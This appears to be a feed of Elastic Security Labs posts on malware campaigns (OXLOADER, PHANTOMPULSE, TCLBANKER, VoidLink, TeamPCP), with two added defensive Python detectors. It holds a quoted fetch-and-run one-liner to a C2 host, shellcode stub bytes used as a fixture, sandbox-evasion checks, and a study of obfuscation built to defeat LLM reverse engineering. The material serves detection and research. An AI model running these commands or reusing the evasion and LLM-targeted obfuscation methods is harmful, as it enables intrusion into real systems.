Elastic Security Labs is democratizing security by sharing knowledge and capabilities necessary to prepare for threats. Spiritually serving humanity since 2019.
OXLOADER is staging shellcode in the PE .reloc section. Detection rates are low.
New research from Elastic Security Labs.
Legitimate toolchains don't emit code into .reloc. It's a static-analysis red flag, but most engines aren't catching it in practice.
Before dropping the payload, OXLOADER runs 5 checks:
- Emulation: malformed WNetAddConnection2W call, expects ERROR_BAD_NAME (0x43)
- CPU count: 3+ CPUs required
- RAM: 3 GB minimum via GlobalMemoryStatusEx
- Display refresh rate: 20 Hz floor via WMI Win32_VideoController
- Geography: CIS GEOIDs and Russian LANGID excluded
Pass all five, and a copied system DLL gets a new .xtext section injected with the shellcode. DonutLoader wraps the final payload: CASTLESTEALER.
Distributed via Google Ads impersonating Node.js. The ad campaign targeted US-based victims. The advertiser account has since been removed.
Elastic Defend catches the full chain behaviourally. Static engines largely miss it.
For the full technical breakdown, YARA rules, and IOCs, read the post from @DanielStepanic and @k33b0i: https://t.co/NoA6sCz3Q0
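The .reloc observation above is worth turning into a check you can run yourself. The following is an added example for this page, not Elastic Security Labs' code or YARA and not derived from the OXLOADER sample: it parses the PE section table with the standard library only and tests whether .reloc actually decodes as a chain of IMAGE_BASE_RELOCATION blocks, which is the only content a linker ever emits there. The minimal PE builder, the benign relocation table and the shellcode stand-in bytes are constructed fixtures, and the entropy ceiling is a heuristic picked for this example.

```python
"""Static check for shellcode staged in a PE .reloc section (added example)."""
import math
import struct
from collections import Counter

IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
FILE_ALIGN = 0x200
# Heuristic ceiling chosen for this example: relocation entries are repetitive
# (a type nibble plus 12-bit page offsets), so real tables stay well below it.
RELOC_ENTROPY_CEILING = 6.0


def _align(n: int, a: int) -> int:
    return (n + a - 1) // a * a


def shannon_entropy(data: bytes) -> float:
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def parse_sections(pe: bytes) -> list[tuple[str, int, bytes]]:
    """Return (name, characteristics, raw bytes) for every section header."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    coff = e_lfanew + 4
    num_sections = struct.unpack_from("<H", pe, coff + 2)[0]
    size_opt = struct.unpack_from("<H", pe, coff + 16)[0]
    table = coff + 20 + size_opt  # section table follows the optional header
    out = []
    for i in range(num_sections):
        (name, vsize, _va, raw_size, raw_ptr,
         _, _, _, _, chars) = struct.unpack_from("<8sIIIIIIHHI", pe, table + 40 * i)
        length = min(vsize, raw_size) if vsize else raw_size
        out.append((name.rstrip(b"\0").decode("ascii", "replace"), chars,
                    pe[raw_ptr:raw_ptr + length]))
    return out


def walks_as_relocations(data: bytes) -> bool:
    """True if data is a chain of IMAGE_BASE_RELOCATION blocks (VirtualAddress,
    SizeOfBlock, then 16-bit type:offset entries), optionally zero-padded."""
    off = 0
    while off + 8 <= len(data):
        page_rva, size = struct.unpack_from("<II", data, off)
        if page_rva == 0 and size == 0:
            break  # start of trailing padding
        if size < 8 or size % 2 or off + size > len(data):
            return False
        for (entry,) in struct.iter_unpack("<H", data[off + 8:off + size]):
            if entry >> 12 > 10:  # IMAGE_REL_BASED_* types are defined 0..10
                return False
        off += size
    return all(b == 0 for b in data[off:])


def analyze_reloc(pe: bytes) -> list[str]:
    """Findings for the .reloc section; an empty list means nothing suspicious."""
    findings = []
    for name, chars, data in parse_sections(pe):
        if name != ".reloc":
            continue
        if chars & (IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_CNT_CODE):
            findings.append("executable/code characteristics set on .reloc")
        if not walks_as_relocations(data):
            findings.append("section does not decode as IMAGE_BASE_RELOCATION blocks")
        ent = shannon_entropy(data)
        if ent > RELOC_ENTROPY_CEILING:
            findings.append(f"entropy {ent:.2f} exceeds heuristic ceiling for relocation data")
    return findings


def build_pe(sections: list[tuple[str, int, bytes]]) -> bytes:
    """Constructed fixture builder: a minimal PE32+ whose optional header is
    zero apart from its magic, followed by the given sections."""
    size_opt = 0xF0
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, len(sections), 0, 0, 0, size_opt, 0x22)
    opt = bytearray(size_opt)
    struct.pack_into("<H", opt, 0, 0x20B)  # PE32+ magic
    raw_ptr = _align(0x40 + 4 + 20 + size_opt + 40 * len(sections), FILE_ALIGN)
    table, blobs, va = b"", b"", 0x1000
    for name, chars, data in sections:
        raw_size = _align(len(data), FILE_ALIGN)
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), len(data),
                             va, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        blobs += data.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += _align(len(data), 0x1000)
    header = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + table
    return header.ljust(_align(len(header), FILE_ALIGN), b"\0") + blobs


def reloc_block(page_rva: int, offsets: list[int]) -> bytes:
    """One block of DIR64 (type 0xA) entries, padded with an ABSOLUTE entry."""
    entries = b"".join(struct.pack("<H", (0xA << 12) | off) for off in offsets)
    if len(entries) % 4:
        entries += b"\0\0"
    return struct.pack("<II", page_rva, 8 + len(entries)) + entries


# Constructed fixtures: a normal relocation table and illustrative stub bytes
# standing in for staged shellcode (not taken from any real sample).
BENIGN_RELOC = reloc_block(0x1000, [0x010, 0x018, 0x020]) + reloc_block(0x2000, [0x100, 0x108])
SHELLCODE_STUB = bytes.fromhex("fc4883e4f0e8c0000000415141505251564831d2")
DATA_FLAGS = 0x42000040  # INITIALIZED_DATA | DISCARDABLE | READ, what linkers set on .reloc
CODE_FLAGS = 0x60000020  # CODE | EXECUTE | READ
BENIGN_PE = build_pe([(".text", CODE_FLAGS, b"\xc3"), (".reloc", DATA_FLAGS, BENIGN_RELOC)])
STAGED_PE = build_pe([(".text", CODE_FLAGS, b"\xc3"), (".reloc", DATA_FLAGS, SHELLCODE_STUB)])

if __name__ == "__main__":
    for label, pe in (("benign", BENIGN_PE), ("staged", STAGED_PE)):
        print(label, analyze_reloc(pe) or ["clean"])
```

The staged fixture deliberately keeps the normal data-only section flags, so the characteristics check stays silent and only the structural walk fires. That is the point for hunting: a loader that just reads its stage out of .reloc has no reason to mark the section executable, so flag-based rules alone will miss it, while "does this decode as relocation blocks" does not depend on how the attacker set the header.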
Attackers are using AI to cut attack timelines to minutes.
@andythevariable, @jamesspi and @danielmiessler get into what that means for your SOC, live on June 17.
On June 17, I'm going live with @jamesspi and @danielmiessler to cover the Obsidian and Axios supply chain attacks, and how AI agents can speed response.
Humans don't leave the loop; they're moved to the top of it.
10am PT / 1pm ET @elasticseclabs
https://t.co/uTVaO44Lno
Your SOC tools don't talk to your dev tools. Your detection engineers write rules in one place and investigate in another.
Live on June 17, we're demoing autonomous investigation workflows and security operations running inside Claude, Cursor, and Copilot.
One week to go. Register now: https://t.co/f3bk2NABBt
PHANTOMPULSE routes C2 through Ethereum/Base/Optimism transaction inputs.
The blockchain resolver has zero sender verification.
That means one transaction from a defender overrides the C2 URL for every active implant simultaneously.
@soolidsnakee reverse-engineered the full implant: three injection techniques, a shared HWBP primitive that kills AMSI/WLDP/ETW in a single handler, and a 580c XOR signature you can use to hunt sibling wallets right now.
https://t.co/M0M3mzCzB0
Attackers are compressing timelines from hours to minutes. Most SOCs are still stitching context together across three tabs and a ticket.
On June 17, we're showing the full lifecycle, from first alert to staged response, with AI agents handling triage, enrichment, and investigation live. Prizes too.
Save your seat: https://t.co/1Iihl0rXa8
We uncovered a new Brazilian banking trojan campaign: TCLBANKER.
What makes TCLBANKER notable isn’t just the malware itself, but how it spreads.
The campaign uses compromised WhatsApp and Outlook accounts to propagate through trusted user relationships, deploys targeted banking overlays, and incorporates anti-analysis techniques designed to evade detection.
For defenders, it’s another example of malware increasingly blending into legitimate user behavior and everyday communication channels, making detection harder and trust easier to exploit.
Our latest research breaks down the infection chain, propagation methods, evasion tactics, and detection opportunities observed across the campaign.
Read the full analysis: https://t.co/9z47oaEWdD
It's a drop-in CI template (no Python, no custom runtimes) that runs 50+ regex signals across changed CI/CD files, then passes the full diff and signal summary to Claude Code for structured threat analysis.
Works across GitHub Actions, GitLab CI, and Azure DevOps. Verdicts ship to Elasticsearch so you can correlate across platforms with ES|QL.
19 malicious example diffs included, modeled after real incidents. Nord Stream payloads. ArtiPACKED. Contagious Interview IDE poisoning. The test suite validates every signal.
Full research + repo:
Blog: https://t.co/PtPduYdzbM
Tool: https://t.co/C9iaLjpfWe
Your YAML files hold more credentials than most production servers.
The GhostAction campaign last September hit 817 repos and stole 3,325 secrets this way.
HackerBot-Claw followed in February, systematically scanning for pull_request_target misconfigs across public repos.
Aqua's Trivy repo was fully compromised. 33,000 secrets. Nearly 7,000 machines.
We built cicd-abuse-detector to catch this at the PR stage.
LLMs have gotten good enough at reverse engineering to recover source code from obfuscated binaries with real accuracy.
So we asked the obvious next question: how fast and cheap is it to use one to build obfuscation specifically designed to beat it?
We benchmarked Claude Opus 4.6 against the Tigress obfuscator across 20 targets first, to map its strengths and failure modes. 40% solve rate. Phase 3 multi-layer combos hit 0%, with cost explosions that killed the runs.
Then we ran a dev/test/refine loop to build 3 purpose-built obfuscation variants targeting the same crackme, iterating directly against the model's known weaknesses.
The finding: LLM-targeted obfuscation is fast and cheap to develop. Context windows, budget caps, and shortcut biases are all exploitable attack surfaces.
The arms race just shifted.
Attackers in containers don't leave persistent artifacts. No files on disk. No post-incident logs. Just short-lived runtime behavior.
Traditional detection approaches weren't built for this. Defend for Containers is.
@RFGroenewoud published a deep-dive on how D4C captures runtime signals inside containerized Linux workloads, and how to build detection logic on top of it.
The key things D4C gives you that you don't get elsewhere:
- process.interactive flags hands-on-keyboard activity in production containers — rare and high-signal
- Linux capability fields (effective + permitted) let you assess actual exploit potential, not just process names
- Every event enriched with pod name, namespace, cluster, and privilege context
- Policy wildcards let you scope detections to specific images, namespaces, or directory trees
https://t.co/7nKk7mllv7
Key takeaways:
- Threat actors posed as a VC firm on LinkedIn and Telegram, luring targets into opening a weaponized Obsidian vault
- The attack abuses Obsidian's Shell Commands plugin to execute a malicious payload on vault open, no vulnerability required
- PHANTOMPULSE is a previously undocumented Windows RAT with blockchain-based C2 resolution via Ethereum transaction data
- The macOS payload uses an obfuscated AppleScript dropper with a Telegram channel as a fallback C2
- Elastic Defend detected and blocked the attack before PHANTOMPULSE could execute
We have identified a novel social engineering campaign abusing Obsidian, the popular note-taking app, to deliver a previously undocumented RAT #PHANTOMPULSE and its loader #PHANTOMPULL targeting individuals in finance and crypto.
The attack never exploits a vulnerability. It abuses Obsidian's own plugin ecosystem to execute code the moment a victim opens a shared vault.
Full analysis: https://t.co/y7sGjClCKc
What D4C catches across the kill chain:
- curl spawns a shell interpreter → caught at Stage 1
- Service account token check (/var/run/secrets/...) → flags Kubernetes pivot intent
- kube.py downloaded to /tmp, executed immediately → cluster-wide lateral movement begins
- Competitor mining processes killed via pkill → even that gets flagged
Real-world scenario. Real detection logic. Full MITRE ATT&CK coverage from exec to impact.
Read the full blog: https://t.co/jvzxchYFhG
One command. No file written to disk. Full code execution inside a container.
curl -fsSL [C2]:666/files/proxy.sh | bash
This is how TeamPCP's container ransomware operation starts.
Elastic Security Labs walked the full attack chain using Defend for Containers (D4C) to show exactly what runtime signals surface at every stage.
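As an added example (not Elastic's D4C code, schema or rule syntax), the stages the thread lists can be written as rules over process events and run against a constructed event sequence. The events below are fabricated fixtures shaped like ECS documents; the field names used (process.name, process.parent.name, process.args, process.executable, process.interactive, orchestrator.namespace) are assumptions about the telemetry shape, the service-account path is matched only on the prefix the post shows, and the miner name in the pkill fixture is illustrative.

```python
"""Rule set for a curl | bash container kill chain over ECS-shaped events (added example)."""

SHELLS = {"sh", "bash", "dash", "ash", "zsh"}
DOWNLOADERS = {"curl", "wget"}
INTERPRETERS = SHELLS | {"python", "python3", "perl"}
KILLERS = {"pkill", "killall"}
SECRETS_PREFIX = "/var/run/secrets/"  # only the prefix the post shows is matched


def field(ev: dict, dotted: str, default=None):
    """Walk a dotted ECS-style path through nested dicts."""
    cur = ev
    for part in dotted.split("."):
        if not isinstance(cur, dict) or part not in cur:
            return default
        cur = cur[part]
    return cur


def rule_downloader_spawns_shell(ev):
    # Stage 1: a downloader is the parent of a shell interpreter.
    if field(ev, "process.parent.name") in DOWNLOADERS and field(ev, "process.name") in SHELLS:
        return "Execution: downloader spawned a shell interpreter"


def rule_service_account_probe(ev):
    # Any argument under the mounted secrets path signals Kubernetes pivot intent.
    if any(a.startswith(SECRETS_PREFIX) for a in field(ev, "process.args", [])):
        return "Discovery: service account token path touched (Kubernetes pivot intent)"


def rule_exec_from_tmp(ev):
    # A binary living in /tmp, or an interpreter handed a script from /tmp.
    name, args = field(ev, "process.name"), field(ev, "process.args", [])
    if field(ev, "process.executable", "").startswith("/tmp/") or (
        name in INTERPRETERS and any(a.startswith("/tmp/") for a in args[1:])
    ):
        return "Lateral movement: payload executed from /tmp"


def rule_mass_kill(ev):
    # pkill/killall inside a container is rare enough to surface on its own.
    if field(ev, "process.name") in KILLERS:
        return "Impact: pkill/killall inside container (competing miners, cleanup)"


def rule_interactive_shell(ev):
    # process.interactive marks hands-on-keyboard activity in production.
    if field(ev, "process.interactive") is True and field(ev, "process.name") in SHELLS:
        return "Hands-on-keyboard: interactive shell in a production container"


RULES = [rule_downloader_spawns_shell, rule_service_account_probe,
         rule_exec_from_tmp, rule_mass_kill, rule_interactive_shell]


def evaluate(events: list[dict]) -> list[tuple[int, str, str]]:
    """Return (event index, namespace, verdict) for every rule that fires."""
    hits = []
    for i, ev in enumerate(events):
        ns = field(ev, "orchestrator.namespace", "?")
        for rule in RULES:
            verdict = rule(ev)
            if verdict:
                hits.append((i, ns, verdict))
    return hits


def _ev(name, args, parent=None, exe=None, interactive=False, ns="prod"):
    """Build one constructed ECS-shaped process event (fixture helper)."""
    return {"process": {"name": name, "args": args, "executable": exe or f"/usr/bin/{name}",
                        "interactive": interactive, "parent": {"name": parent}},
            "orchestrator": {"namespace": ns}}


# Constructed sequence mirroring the stages in the post; the miner name is illustrative.
EVENTS = [
    _ev("bash", ["bash"], parent="curl", exe="/bin/bash"),
    _ev("ls", ["ls", "-la", SECRETS_PREFIX]),
    _ev("python3", ["python3", "/tmp/kube.py"]),
    _ev("pkill", ["pkill", "-9", "-f", "xmrig"]),
    _ev("bash", ["bash", "-i"], parent="sh", exe="/bin/bash", interactive=True),
    _ev("nginx", ["nginx", "-g", "daemon off;"]),  # benign baseline, should not fire
]

if __name__ == "__main__":
    for i, ns, verdict in evaluate(EVENTS):
        print(f"event {i} [{ns}] {verdict}")
```

Each rule keys on a behaviour rather than a file hash, which is what a fileless curl | bash chain leaves you with. The namespace carried through to the verdict stands for the pod and cluster enrichment the post describes; without it, a hit on a throwaway CI namespace and one in a production namespace look identical.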
🧵 It calls itself "AMD Memory Encryption Support." It's not.
VoidLink's Linux rootkit disguises as a legitimate AMD kernel driver then hides processes, connections, and itself from the OS entirely.
Elastic Security Labs analyzed leaked source code revealing 4 generations of this rootkit, from CentOS 7 to Ubuntu 22.04.
One more thing. Check Point Research established VoidLink was built almost entirely through AI-assisted workflows, concept to functional implant in under a week.
The source code confirms it at the code level. Phase-numbered changelogs structured like LLM prompts. Tutorial-style comments explaining basic kernel concepts. 10 sequential eBPF iterations with reasoning traces left in.
This is what AI-lowered barriers to kernel development look like in the wild.